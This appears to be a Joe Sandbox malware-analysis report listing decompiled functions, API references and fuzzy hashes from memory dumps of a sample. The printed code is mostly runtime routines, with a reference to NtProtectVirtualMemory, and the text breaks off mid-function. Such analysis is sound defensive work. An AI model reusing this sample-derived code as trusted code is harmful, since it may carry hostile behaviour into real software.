Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 66a80842de05f775be95ddeed27e9a468ed250769ecb434d8f2ef2f2d8487a67
Instruction ID: cee9724bde74045f54dcd71d62cce7758e5031fdc82fb92df78ebe8950b55a2c
Opcode Fuzzy Hash: 66a80842de05f775be95ddeed27e9a468ed250769ecb434d8f2ef2f2d8487a67
Instruction Fuzzy Hash: 40E0B6BE640219AFDF40DE9CDC49E9B77EDAB1C6417444401BA19C7300D63AE9629FB1

Uniqueness

Uniqueness Score: -1.00%

Function 0285C458 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285C458() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x287782c = _t1;
				}
				if( *0x287782c == 0) {
					 *0x287782c = E02857FB8;
					return E02857FB8;
				}
				return _t1;
			}

0x0285c45e
0x0285c463
0x0285c467
0x0285c46f
0x0285c474
0x0285c474
0x0285c480
0x0285c487
0x00000000
0x0285c487
0x0285c48d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0287610B,00000000,0287611E), ref: 0285C45E
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0285C46F

Strings

GetDiskFreeSpaceExA, xrefs: 0285C469
kernel32.dll, xrefs: 0285C459

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 1b1733ab3e507a9d4bdc21a83ab036f42c19c2a3170d5663f7cb39d59bd5c21b
Instruction ID: 6eda00ff5c3d0633e95021299f3b12ebca01cef4f55d0b5a08795f24a5b666d2
Opcode Fuzzy Hash: 1b1733ab3e507a9d4bdc21a83ab036f42c19c2a3170d5663f7cb39d59bd5c21b
Instruction Fuzzy Hash: 3CD09E6CA403355EE7105AB5EC84E3963D99709717F80C426E906D6241D7B5C498CFDD

Uniqueness

Uniqueness Score: -1.00%

Function 0285E1CC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0285E1CC(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0285E014(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0285D234();
							E0285E014(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0285D23C();
							E0285E014(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0285E170(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0285E140(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0285D244();
						E0285E014(_v780);
						E0285E3C4(_v792);
					}
				}
				L15:
				_push(_v776);
				L0285CDCC();
				return E0285E014(_v776);
			}

0x0285e1d8
0x0285e1e8
0x0285e1ef
0x0285e1ef
0x0285e1fa
0x0285e208
0x0285e217
0x0285e235
0x0285e219
0x0285e224
0x0285e224
0x0285e244
0x0285e250
0x0285e253
0x0285e255
0x0285e256
0x0285e258
0x0285e25e
0x0285e260
0x0285e26f
0x0285e270
0x0285e27a
0x0285e27b
0x0285e280
0x0285e28b
0x0285e28c
0x0285e296
0x0285e297
0x0285e29c
0x0285e2b7
0x0285e2b9
0x0285e2ba
0x0285e2bd
0x0285e2bd
0x0285e25e
0x0285e2c6
0x0285e2c9
0x0285e2cb
0x0285e2cc
0x0285e2d2
0x0285e2d8
0x0285e2da
0x0285e2dc
0x0285e2df
0x0285e2e2
0x0285e2e2
0x0285e2e5
0x00000000
0x00000000
0x00000000
0x0285e2e5
0x0285e2e5
0x0285e2ec
0x0285e2f7
0x0285e2ff
0x0285e306
0x0285e30d
0x0285e30e
0x0285e313
0x0285e31e
0x0285e31e
0x0285e32c
0x0285e330
0x0285e336
0x0285e337
0x0285e347

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E27B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E297
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E30E
VariantClear.OLEAUT32(?), ref: 0285E337

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 4139d86a5351ba75ea971895f676a893b40f874f23d51f375acce6fa07ca3740
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 4D41F47DA016299FCB62DF58CC90BD9B3BDAF48604F0041D5EA4DE7215DA30AF818F62

Uniqueness

Uniqueness Score: -1.00%

Function 0285AD20 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285AD20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x28a57f8; // 0x2850000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0285AD14(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E02858070( &_v273, 0x104, E0285BC10( &_v534, 0x5c) + 1);
				_t74 = 0x285aea0;
				_t86 = 0x285aea0;
				_t83 =  *0x2856a8c; // 0x2856ad8
				if(E02853850(_t87, _t83) != 0) {
					_t74 = E02854964( *((intOrPtr*)(_t87 + 4)));
					_t69 = E02858048(_t74, 0x285aea0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x285aea4;
					}
				}
				_t51 =  *0x28a2e04; // 0x2856874
				_t16 = _t51 + 4; // 0xffe9
				_t53 =  *0x28a57f8; // 0x2850000
				LoadStringA(E02855874(_t53),  *_t16,  &_v790, 0x100);
				E0285363C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E02858590(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E02858048(_v8, _t86);
			}

0x0285ad20
0x0285ad2c
0x0285ad2f
0x0285ad31
0x0285ad3d
0x0285ad4c
0x0285ad76
0x0285ad7c
0x0285ad88
0x0285ad8d
0x0285ad93
0x0285ad93
0x0285adb1
0x0285adb6
0x0285adbb
0x0285adc2
0x0285adcf
0x0285add9
0x0285addd
0x0285ade4
0x0285aded
0x0285aded
0x0285ade4
0x0285adfe
0x0285ae03
0x0285ae07
0x0285ae12
0x0285ae1f
0x0285ae2a
0x0285ae30
0x0285ae3d
0x0285ae43
0x0285ae4d
0x0285ae53
0x0285ae5a
0x0285ae60
0x0285ae67
0x0285ae6d
0x0285ae89
0x0285ae9c

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0285AD3D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0285AD61
GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285AD7C
LoadStringA.USER32 ref: 0285AE12

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 4342d5967bfdabb9ec3380043b41d5a98f135563103603af8547a6afcc393f45
Instruction ID: d204ddb52902fa547d88827894a6ac8b33a9207a17508e3688285a0c85b44c9f
Opcode Fuzzy Hash: 4342d5967bfdabb9ec3380043b41d5a98f135563103603af8547a6afcc393f45
Instruction Fuzzy Hash: AA412F7D9402689BDB21EB68CC84BDAB7FDAF08301F4041E5A948E7251DB74AF88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02851C6C Relevance: 5.3, APIs: 4, Instructions: 330
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02851C6C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
				unsigned int _t184;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				void* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				signed int _t208;

				_t181 = __edi;
				_t166 = __edx;
				_t145 =  *(__eax - 4);
				_t196 = __eax;
				if((_t145 & 0x00000007) != 0) {
					__eflags = _t145 & 0x00000005;
					if((_t145 & 0x00000005) != 0) {
						__eflags = _t145 & 0x00000003;
						if((_t145 & 0x00000003) != 0) {
							__eflags = 0;
							return 0;
						} else {
							_t146 = _t145 - 0x18;
							__eflags = __edx - _t146;
							if(__edx <= _t146) {
								__eflags = __edx - _t146 >> 1;
								if(__edx < _t146 >> 1) {
									_t131 = __edx;
									_t58 = E02851724(__edx);
									__eflags = _t58;
									if(_t58 == 0) {
										goto L61;
									} else {
										__eflags = _t131 - 0x40a2c;
										if(_t131 > 0x40a2c) {
											 *((intOrPtr*)(_t58 - 8)) = _t131;
										}
										E028514A4(_t196, _t131, _t58);
										E02851A8C(_t196, _t181);
										return _t58;
									}
								} else {
									 *((intOrPtr*)(__eax - 8)) = __edx;
									return __eax;
								}
							} else {
								asm("adc eax, 0xffffffff");
								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
								_push(__edx);
								_t58 = E02851724((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
								_pop(_t168);
								__eflags = _t58;
								if(_t58 != 0) {
									__eflags = _t133 - 0x40a2c;
									if(_t133 > 0x40a2c) {
										 *((intOrPtr*)(_t58 - 8)) = _t168;
									}
									E02851474(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
									E02851A8C(_t196, _t181);
									return _t58;
								}
								L61:
								return _t58;
							}
						}
					} else {
						_t153 = _t145 & 0xfffffff0;
						_push(__edi);
						_t182 = _t153 + __eax;
						_t154 = _t153 - 4;
						_t136 = _t145 & 0x0000000f;
						__eflags = __edx - _t154;
						if(__edx > _t154) {
							_t73 =  *(_t182 - 4);
							__eflags = _t73 & 0x00000001;
							if((_t73 & 0x00000001) == 0) {
								L51:
								asm("adc edi, 0xffffffff");
								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
								_t184 = _t154;
								_t80 = E02851724(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
								_t170 = _t166;
								__eflags = _t80;
								if(_t80 == 0) {
									goto L49;
								} else {
									__eflags = _t198 - 0x40a2c;
									if(_t198 > 0x40a2c) {
										 *((intOrPtr*)(_t80 - 8)) = _t170;
									}
									E02851474(_t196, _t184, _t80);
									E02851A8C(_t196, _t184);
									return _t80;
								}
							} else {
								_t86 = _t73 & 0xfffffff0;
								_t202 = _t154 + _t86;
								__eflags = __edx - _t202;
								if(__edx > _t202) {
									goto L51;
								} else {
									__eflags =  *0x28a304d;
									if(__eflags == 0) {
										L42:
										__eflags = _t86 - 0xb30;
										if(_t86 >= 0xb30) {
											E028514C0(_t182);
											_t166 = _t166;
											_t154 = _t154;
										}
										asm("adc edi, 0xffffffff");
										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t173 = _t202 + 4 - _t94;
										__eflags = _t173;
										if(_t173 > 0) {
											 *(_t196 + _t202 - 4) = _t173;
											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
											_t203 = _t94;
											__eflags = _t173 - 0xb30;
											if(_t173 >= 0xb30) {
												__eflags = _t94 + _t196;
												E02851500(_t94 + _t196, _t154, _t173);
											}
										} else {
											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
											_t203 = _t202 + 4;
										}
										_t204 = _t203 | _t136;
										__eflags = _t204;
										 *(_t196 - 4) = _t204;
										 *0x28a3718 = 0;
										_t80 = _t196;
										L49:
										return _t80;
									} else {
										while(1) {
											asm("lock cmpxchg [0x28a3718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t166 = _t166;
											_t154 = _t154;
											asm("lock cmpxchg [0x28a3718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t166 = _t166;
												_t154 = _t154;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										_t100 =  *(_t182 - 4);
										__eflags = _t100 & 0x00000001;
										if((_t100 & 0x00000001) == 0) {
											L50:
											 *0x28a3718 = 0;
											goto L51;
										} else {
											_t86 = _t100 & 0xfffffff0;
											_t202 = _t154 + _t86;
											__eflags = _t166 - _t202;
											if(_t166 > _t202) {
												goto L50;
											} else {
												goto L42;
											}
										}
									}
								}
							}
						} else {
							_t205 = __edx + __edx;
							__eflags = _t205 - _t154;
							if(_t205 < _t154) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L19:
									_t16 = _t166 + 0xd3; // 0xbff
									_t208 = (_t16 & 0xffffff00) + 0x30;
									_t157 = _t154 + 4 - _t208;
									__eflags =  *0x28a304d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x28a3718], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t157 = _t157;
											asm("lock cmpxchg [0x28a3718], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t157 = _t157;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										__eflags = 0xf;
									}
									 *(_t196 - 4) = _t136 | _t208;
									_t139 = _t157;
									_t174 =  *(_t182 - 4);
									__eflags = _t174 & 0x00000001;
									if((_t174 & 0x00000001) != 0) {
										_t102 = _t182;
										_t175 = _t174 & 0xfffffff0;
										_t139 = _t139 + _t175;
										_t182 = _t182 + _t175;
										__eflags = _t175 - 0xb30;
										if(_t175 >= 0xb30) {
											E028514C0(_t102);
										}
									} else {
										 *(_t182 - 4) = _t174 | 0x00000008;
									}
									 *((intOrPtr*)(_t182 - 8)) = _t139;
									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
									__eflags = _t139 - 0xb30;
									if(_t139 >= 0xb30) {
										E02851500(_t196 + _t208, _t157, _t139);
									}
									 *0x28a3718 = 0;
									return _t196;
								} else {
									__eflags = _t205 - 0xb2c;
									if(_t205 < 0xb2c) {
										_t190 = __edx;
										_t111 = E02851724(__edx);
										__eflags = _t111;
										if(_t111 != 0) {
											E028514A4(_t196, _t190, _t111);
											E02851A8C(_t196, _t190);
										}
										return _t111;
									} else {
										_t166 = 0xb2c;
										goto L19;
									}
								}
							} else {
								return __eax;
							}
						}
					}
				} else {
					_t141 =  *_t145;
					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
					if(_t160 < __edx) {
						_push(__edi);
						_t193 = __edx;
						asm("adc eax, 0xffffffff");
						_t119 = E02851724((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
						__eflags = _t119;
						if(_t119 != 0) {
							__eflags = _t193 - 0x40a2c;
							if(_t193 > 0x40a2c) {
								 *((intOrPtr*)(_t119 - 8)) = _t193;
							}
							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
							_t195 = _t119;
							 *((intOrPtr*)(_t141 + 0x1c))();
							E02851A8C(_t196, _t195);
							_t119 = _t195;
						}
						return _t119;
					} else {
						if(0x40 + __edx * 4 < _t160) {
							_t143 = __edx;
							_t125 = E02851724(__edx);
							__eflags = _t125;
							if(_t125 != 0) {
								E028514A4(_t196, _t143, _t125);
								E02851A8C(_t196, __edi);
								return _t125;
							}
							return _t125;
						} else {
							return __eax;
						}
					}
				}
			}

0x02851c6c
0x02851c6c
0x02851c6c
0x02851c74
0x02851c76
0x02851d04
0x02851d07
0x02851f58
0x02851f5b
0x02851fec
0x02851ff0
0x02851f61
0x02851f61
0x02851f64
0x02851f66
0x02851fae
0x02851fb0
0x02851fb8
0x02851fbc
0x02851fc1
0x02851fc3
0x00000000
0x02851fc5
0x02851fc5
0x02851fcb
0x02851fcd
0x02851fcd
0x02851fd8
0x02851fdf
0x02851fe8
0x02851fe8
0x02851fb2
0x02851fb2
0x02851fb7
0x02851fb7
0x02851f68
0x02851f73
0x02851f7a
0x02851f7c
0x02851f7d
0x02851f82
0x02851f83
0x02851f85
0x02851f87
0x02851f8d
0x02851f8f
0x02851f8f
0x02851f9b
0x02851fa2
0x00000000
0x02851fa7
0x02851fab
0x02851fab
0x02851fab
0x02851f66
0x02851d0d
0x02851d0f
0x02851d12
0x02851d13
0x02851d16
0x02851d19
0x02851d1c
0x02851d1f
0x02851e24
0x02851e27
0x02851e29
0x02851f10
0x02851f1b
0x02851f22
0x02851f24
0x02851f27
0x02851f2c
0x02851f2d
0x02851f2f
0x00000000
0x02851f31
0x02851f31
0x02851f37
0x02851f39
0x02851f39
0x02851f44
0x02851f4b
0x02851f56
0x02851f56
0x02851e2f
0x02851e2f
0x02851e32
0x02851e35
0x02851e37
0x00000000
0x02851e3d
0x02851e3d
0x02851e44
0x02851e95
0x02851e95
0x02851e9a
0x02851ea0
0x02851ea5
0x02851ea6
0x02851ea6
0x02851eb2
0x02851ec3
0x02851ec9
0x02851ec9
0x02851ecb
0x02851ed8
0x02851edf
0x02851ee3
0x02851ee5
0x02851eeb
0x02851eed
0x02851eef
0x02851eef
0x02851ecd
0x02851ecd
0x02851ed1
0x02851ed1
0x02851ef4
0x02851ef4
0x02851ef6
0x02851ef9
0x02851f00
0x02851f02
0x02851f06
0x02851e46
0x02851e46
0x02851e4b
0x02851e53
0x00000000
0x00000000
0x02851e59
0x02851e5e
0x02851e5f
0x02851e65
0x02851e6d
0x02851e73
0x02851e78
0x02851e79
0x00000000
0x02851e79
0x00000000
0x02851e6d
0x02851e81
0x02851e84
0x02851e87
0x02851e89
0x02851f09
0x02851f09
0x00000000
0x02851e8b
0x02851e8b
0x02851e8e
0x02851e91
0x02851e93
0x00000000
0x00000000
0x00000000
0x00000000
0x02851e93
0x02851e89
0x02851e44
0x02851e37
0x02851d25
0x02851d25
0x02851d28
0x02851d2a
0x02851d34
0x02851d3a
0x02851d4d
0x02851d4d
0x02851d59
0x02851d5f
0x02851d61
0x02851d68
0x02851d6a
0x02851d6f
0x02851d77
0x00000000
0x00000000
0x02851d7c
0x02851d81
0x02851d87
0x02851d8f
0x02851d94
0x02851d99
0x00000000
0x02851d99
0x00000000
0x02851d8f
0x02851da1
0x02851da1
0x02851da1
0x02851da6
0x02851da9
0x02851dab
0x02851dae
0x02851db1
0x02851dbc
0x02851dbe
0x02851dc1
0x02851dc3
0x02851dc5
0x02851dcb
0x02851dcd
0x02851dcd
0x02851db3
0x02851db6
0x02851db6
0x02851dd2
0x02851dd8
0x02851ddc
0x02851de2
0x02851de9
0x02851de9
0x02851dee
0x02851dfb
0x02851d3c
0x02851d3c
0x02851d42
0x02851dfc
0x02851e00
0x02851e05
0x02851e07
0x02851e11
0x02851e18
0x02851e18
0x02851e23
0x02851d48
0x02851d48
0x00000000
0x02851d48
0x02851d42
0x02851d2c
0x02851d30
0x02851d30
0x02851d2a
0x02851d1f
0x02851c7c
0x02851c7c
0x02851c82
0x02851c87
0x02851cc4
0x02851cc5
0x02851ccb
0x02851cd2
0x02851cd7
0x02851cd9
0x02851cdb
0x02851ce1
0x02851ce3
0x02851ce3
0x02851cea
0x02851cef
0x02851cf3
0x02851cf8
0x02851cfd
0x02851cfd
0x02851d02
0x02851c89
0x02851c92
0x02851c98
0x02851c9c
0x02851ca1
0x02851ca3
0x02851cad
0x02851cb4
0x00000000
0x02851cb9
0x02851cbd
0x02851c96
0x02851c96
0x02851c96
0x02851c92
0x02851c87

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292e506db200ae0628b982862be2d5f05e2563caa5baa89d227a39618a67d797
Instruction ID: 4401bb85eae86f227676d4196107516427a89db6ae504d757577b4227b12064c
Opcode Fuzzy Hash: 292e506db200ae0628b982862be2d5f05e2563caa5baa89d227a39618a67d797
Instruction Fuzzy Hash: 06A108AE7106200BE719AA7C9C883BDB3C2DBC4325F18867EE91DCB385EB64CD518751

Uniqueness

Uniqueness Score: -1.00%

Function 028594D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
threadCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E028594D0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				intOrPtr _v284;
				char* _t34;
				intOrPtr* _t50;
				intOrPtr _t59;
				void* _t64;
				intOrPtr _t66;
				void* _t70;

				_v8 = 0;
				_t50 = __edx;
				_t64 = __eax;
				_push(_t70);
				_push(0x28595be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffee8;
				E028544A0(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t64 > 2) {
					E02854538( &_v8, 0x28595e0);
				} else {
					E02854538( &_v8, 0x28595d4);
				}
				_t34 = E02854964(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
					E02854710(_t50, 0x100,  &_v280);
					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
						_v284 =  *_t50;
						_t66 = _v284;
						if(_t66 != 0) {
							_t66 =  *((intOrPtr*)(_t66 - 4));
						}
						E028549C4( *_t50, _t66 - 1, 2, _t50);
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x28595c5);
				return E028544A0( &_v8);
			}

0x028594dd
0x028594e0
0x028594e2
0x028594e6
0x028594e7
0x028594ec
0x028594ef
0x028594f4
0x02859500
0x0285950b
0x02859516
0x0285951d
0x02859536
0x0285951f
0x02859527
0x02859527
0x0285954a
0x02859563
0x02859572
0x02859578
0x02859583
0x02859589
0x02859591
0x02859596
0x02859596
0x028595a3
0x028595a3
0x02859578
0x028595aa
0x028595ad
0x028595b0
0x028595bd

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028595BE), ref: 02859556
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028595BE), ref: 0285955C

Strings

yyyy, xrefs: 02859531

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: d53e8720b6809156618f00e375c9bc29876514350754d8463e0c1d4c3e83c376
Instruction ID: cfe32399c8cfc6340afd7c53f18c89bef1df025def72a8844467431cdeedb32c
Opcode Fuzzy Hash: d53e8720b6809156618f00e375c9bc29876514350754d8463e0c1d4c3e83c376
Instruction Fuzzy Hash: 41215C7DA042289FDB11DFA8C841AAEB3F9EF48710F4140A5ED09E7250D7749E54CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02868110 Relevance: 5.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02868110(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				void* _v16;
				intOrPtr _v20;
				int _t22;
				void* _t36;
				void* _t43;
				void* _t45;
				void* _t46;

				_t43 = _a12;
				_v20 = _a16 - _a4;
				_t36 = _a12 + 8;
				while(1) {
					_t22 = IsBadReadPtr(_t43, 8);
					if(_t22 != 0) {
						break;
					}
					_t22 = IsBadReadPtr(_t36, 4);
					if(_t22 != 0) {
						break;
					}
